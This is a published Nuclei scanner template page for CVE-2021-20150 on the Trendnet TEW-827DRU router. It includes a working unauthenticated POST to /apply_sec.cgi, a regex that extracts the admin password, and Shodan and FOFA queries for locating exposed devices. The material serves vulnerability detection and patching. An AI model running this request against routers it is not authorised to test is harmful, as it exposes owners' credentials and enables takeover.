Trendnet AC2600 TEW-827DRU - Credentials Disclosure
ID: CVE-2021-20150
Severity: medium
Author: gy741
Tags: cve2021,cve,disclosure,router,tenable,trendnet
Description
Section titled “Description”Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. A user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page.
YAML Source
Section titled “YAML Source”id: CVE-2021-20150
info: name: Trendnet AC2600 TEW-827DRU - Credentials Disclosure author: gy741 severity: medium description: Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. A user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page. impact: | An attacker can obtain sensitive credentials, leading to unauthorized access to the router. remediation: | Update the router firmware to the latest version to fix the vulnerability. reference: - https://www.tenable.com/security/research/tra-2021-54 - https://nvd.nist.gov/vuln/detail/CVE-2021-20150 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2021-20150 cwe-id: CWE-306 epss-score: 0.19434 epss-percentile: 0.95837 cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01:*:*:*:*:*:*:* metadata: max-request: 1 vendor: trendnet product: tew-827dru_firmware shodan-query: - http.html:"TEW-827DRU" - http.html:"tew-827dru" fofa-query: body="tew-827dru" tags: cve2021,cve,disclosure,router,tenable,trendnet
http: - raw: - | POST /apply_sec.cgi HTTP/1.1 Host: {{Hostname}}
action=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp
matchers-condition: and matchers: - type: word part: body words: - 'ftp_username' - 'ftp_password' - 'ftp_permission' - 'TEW-827DRU' condition: and
- type: word part: header words: - "text/html"
- type: status status: - 200
extractors: - type: regex name: password group: 1 regex: - '<input name="admin_passwd" type="password" id="admin_passwd" size="20" maxlength="15" value ="(.*)" />' part: body# digest: 4a0a0047304502206049d31f1513b481f2e8ce6265ad1ec04eb02b8a399805f86e09a980d026d362022100d8fdc49f2fea6f3cd162e8e48b5113393e8f27aef623e5217f6e8ce03169fa7f:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-20150.yaml"